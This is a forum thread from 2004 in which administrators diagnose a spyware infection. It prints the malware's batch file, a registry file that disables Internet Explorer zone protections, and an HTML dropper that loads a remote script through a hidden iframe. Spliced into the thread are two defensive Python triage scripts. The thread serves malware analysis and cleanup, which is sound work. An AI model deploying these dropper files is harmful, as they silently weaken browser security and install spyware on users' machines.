-
July 26th, 2004, 08:19 PM
#1
Junior Member
Possible infection, with odd list of running processes
Good afternoon everyone,
I've got a remote "super user" who managed to sneak her infected machine on the network, and suddenly, I know exactly which machines got overlooked during the last security scan.
All but one have been cleaned up, but the remaining infected machine is proving to be a tough nut to crack. I've run Sophos and Trend Micro AV against it, followed by a few rounds of AdAware and SpyBot, mixed in with a little CWShredder. The problems are still there however, and I have identified the following list of files that seem a bit suspicious.
svchosting.exe
command.eve
wserv32.exe
x.bat
yea.reg
staff.html
According to the searches I've done, these files all belong to a number of different (old) virus variants, but I can't seem to find anything that leaves all of the above.
Any thoughts?
-
July 26th, 2004, 08:28 PM
#2
Sounds like you've got the scanning tools you need. Have you run those scans in "safe mode" (F8 on boot)? Are you positive that AdAware, AVs, and SpyBot are completely updated? Search for that staff.html file, don't execute it, but read its contents with a plaintext editor like Notepad. Same deal with x.bat. It'll help you fingerprint the malware. wserv32.exe looks like it could be trying to act as a webserver, by the name of it. Try browsing to the infected machine's address with all scripting off. Obviously I haven't googled the names of those files, but let us know after you have those steps handled.
Also try AVG antivirus, bitdefender AV, ClamAV as other optional scanners.
-
July 26th, 2004, 10:50 PM
#3
Is the Box fully patched?
wserv32 could be related to this..
http://www.trendmicro.com/vinfo/viru...e=WORM_RBOT.AF
http://www.arkateq.com/virus/698.htm
There are a few "toys" that use x.bat, staff.html and yea.reg; I have only seen listings with these, no actual information as to what they were..
Command.eve may be related to an image editing prog EVE
http://www.dpspro.com/tcs_commands/tcsos_eve.html
Would be interesting to have a look at the code behind a couple of those..
Cheers
"Consumer technology now exceeds the average person's ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
July 27th, 2004, 05:15 PM
#4
Junior Member
Ok, as per Soda's request, I've managed to isolate a few of the files and I'm posting their contents.
First, x.bat
@echo off
REGEDIT.EXE /S YEA.REG
staff.html
x.html
exit
Pretty damn simple. So, let's see what yea.reg does.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000
I'm not familiar with the way Windows goes about its registry business, but it looks like these keys are attempting to alter the way Internet Explorer handles its predefined security zones. Most likely in an attempt to make it easier for other bits of malware to gain access to the machine. Just speculation on my part though.
Finally, staff.html
#<html>
#<title> .:[ y E a K u K z ]:. </title>
#<center>
#<body>
#<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
#<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
#<script language="JavaScript">
#mtrslib_uid = '1677';
#mtrslib_retry = 1;
#mt_set_onload();
#</script>
#</body>
#</center>
#</html>
Not a clue what mtrslib2.js does, but I've added that domain to the hosts file on the local machines here, and have it pointed to an internal page.
Any additional thoughts?
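As an added example (not code posted by anyone in this thread), here is a small Python triage script that parses a .reg file of the kind x.bat imports with REGEDIT /S and reports what it would change in Internet Explorer's zone policy. The sample input is the yea.reg contents from the post above, embedded as a constructed string. The URL action descriptions are the documented IE meanings of those ids (0 = Enable, 1 = Prompt, 3 = Disable), and the zone numbers follow IE's fixed layout (0 My Computer, 1 Local intranet, 2 Trusted sites, 3 Internet, 4 Restricted sites). The ZoneMap\ProtocolDefaults entry deserves its own check: "http"=0 maps every plain-http URL into the My Computer zone, so the per-zone loosening and the remap reinforce each other.

```python
"""Flag Internet Explorer zone weakening in an exported .reg file."""
import re
from typing import Dict, List

# Constructed sample: the yea.reg contents posted in this thread.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000
"""

ZONES_PREFIX = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\"
PROTO_DEFAULTS = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults"

ZONE_NAMES = {0: "My Computer", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Documented IE URL action ids for the values seen in the posted file.
URL_ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
    "1400": "Active scripting",
    "1406": "Access data sources across domains",
    "1606": "Userdata persistence",
    "1607": "Navigate sub-frames across different domains",
    "1A04": "Don't prompt for client certificate selection",
}
SETTING = {0: "Enable", 1: "Prompt", 3: "Disable"}

DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{1,8})$')


def parse_reg(text: str) -> Dict[str, Dict[str, int]]:
    """Return {key path: {value name: dword}} for the dword values in a .reg file."""
    sections: Dict[str, Dict[str, int]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        m = DWORD_LINE.match(line)
        if m and current is not None:
            sections[current][m.group(1)] = int(m.group(2), 16)
        # string/binary values are not needed for this triage and are skipped
    return sections


def audit_ie_zones(sections: Dict[str, Dict[str, int]]) -> List[str]:
    """List every IE URL action switched to Enable and every protocol remapped into a trusted zone."""
    findings: List[str] = []
    for key, values in sections.items():
        hive, _, path = key.partition("\\")
        if path.lower().startswith(ZONES_PREFIX.lower()):
            zone_id = path[len(ZONES_PREFIX):]
            zone = ZONE_NAMES.get(int(zone_id), f"zone {zone_id}") if zone_id.isdigit() else f"zone {zone_id}"
            for name, val in values.items():
                action = URL_ACTIONS.get(name.upper())
                if action and val == 0:
                    findings.append(f"{hive}: {zone}: {name} ({action}) set to {SETTING[0]}")
        elif path.lower() == PROTO_DEFAULTS.lower():
            for proto, zone in values.items():
                if zone in (0, 1, 2):  # Internet-facing protocol pushed into a high-trust zone
                    findings.append(f"{hive}: protocol {proto} mapped to {ZONE_NAMES[zone]} zone")
    return findings


if __name__ == "__main__":
    for finding in audit_ie_zones(parse_reg(SAMPLE_REG)):
        print(finding)
```

Run against the posted file it lists seventeen per-zone actions forced to Enable plus the http-to-My-Computer remap; pointing it at an export of the live HKCU Internet Settings key on a cleaned machine is a quick way to confirm the policy was actually restored rather than just the files deleted.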
-
July 27th, 2004, 10:20 PM
#5
Didn't find my notes at work regarding where I had encountered X.bat and friends.
But I did find mtrslib2.js source
Found this in the body: "MediaTicketsInstallerDemo"
full JS attached
Sry I can't offer better help..
Cheers
Edit: Had a machine late yesterday that had MediaTickets installed, as there appeared to be no associated uninstaller or menu listing..oh and the customer didn't know what it was.. I removed it... This same machine had a file "USER32.EXE" I think it was in the C:\Windows\System folder.. Any scan I ran on this file was clean.. did a quick check using Fileanalyser.. and it appears to be a component of a mass mailer or a phone home bug..
Check your system.INI and registry for references to this file.. it loads with explorer.exe
Be careful.. user32.dll is a system file, don't confuse it with this file..
"Consumer technology now exceeds the average person's ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
July 27th, 2004, 10:27 PM
#6
Junior Member
Originally posted here by Und3ertak3r
Didn't find my notes at work regarding where I had encountered X.bat and friends.
But I did find mtrslib2.js source
Found this in the body: "MediaTicketsInstallerDemo"
full JS attached
Sry I can't offer better help..
Cheers
This is great, thank you. I don't have the tools to pull .js apart, so I'm very happy with this.
Looks to be some sort of spyware, but I'm no programmer, so...
Hehe, turns out the kids who wrote this put their real phone number on the domain contact info for mt-download.com.
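The staff.html dropper from post #4 is a hidden iframe plus a script pulled from a remote host, and the fix the original poster applied was a hosts-file entry for that host. As an added example (not code from this thread), here is a Python triage script that parses such a page with the standard library, reports hidden iframes and remote script sources, and emits the hosts-file lines for the hosts it found. The sample input is the posted staff.html with the leading "#" characters removed; the sinkhole address is an assumption, substitute the internal page used locally.

```python
"""Pull remote-script hosts and hidden iframes out of a suspect HTML page."""
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample: the staff.html posted in this thread, without the '#' prefixes.
SAMPLE_HTML = """<html>
<title> .:[ y E a K u K z ]:. </title>
<center>
<body>
<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
<script language="JavaScript">
mtrslib_uid = '1677';
mtrslib_retry = 1;
mt_set_onload();
</script>
</body>
</center>
</html>
"""

HIDING_STYLES = ("visibility:hidden", "display:none")


class DropperTriage(HTMLParser):
    """Collects remote <script src> URLs and iframes that are styled or sized to be invisible."""

    def __init__(self) -> None:
        super().__init__()
        self.remote_scripts: List[str] = []
        self.hidden_iframes: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases attribute names
        if tag == "script" and a.get("src"):
            self.remote_scripts.append(a["src"])
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            zero_sized = a.get("width") == "0" or a.get("height") == "0"
            if zero_sized or any(h in style for h in HIDING_STYLES):
                self.hidden_iframes.append(a)


def triage_html(text: str) -> Dict[str, list]:
    parser = DropperTriage()
    parser.feed(text)
    parser.close()
    hosts = sorted({urlparse(u).hostname for u in parser.remote_scripts if urlparse(u).hostname})
    return {
        "remote_scripts": parser.remote_scripts,
        "hidden_iframes": parser.hidden_iframes,
        "block_hosts": hosts,
    }


def hosts_file_lines(hosts: List[str], sinkhole: str = "127.0.0.1") -> List[str]:
    """Hosts-file entries pointing each host at the sinkhole (assumed address, adjust locally)."""
    return [f"{sinkhole}\t{h}" for h in hosts]


if __name__ == "__main__":
    result = triage_html(SAMPLE_HTML)
    print("remote scripts:", result["remote_scripts"])
    print("hidden iframes:", len(result["hidden_iframes"]))
    print("\n".join(hosts_file_lines(result["block_hosts"])))
```

The hosts-file sinkhole stops the loader only until the next variant uses a different domain, so the more durable use of the output is as a detection list: the same host names can be fed to proxy or DNS logs to find the other machines that fetched mtrslib2.js, which is exactly the set the last security scan overlooked.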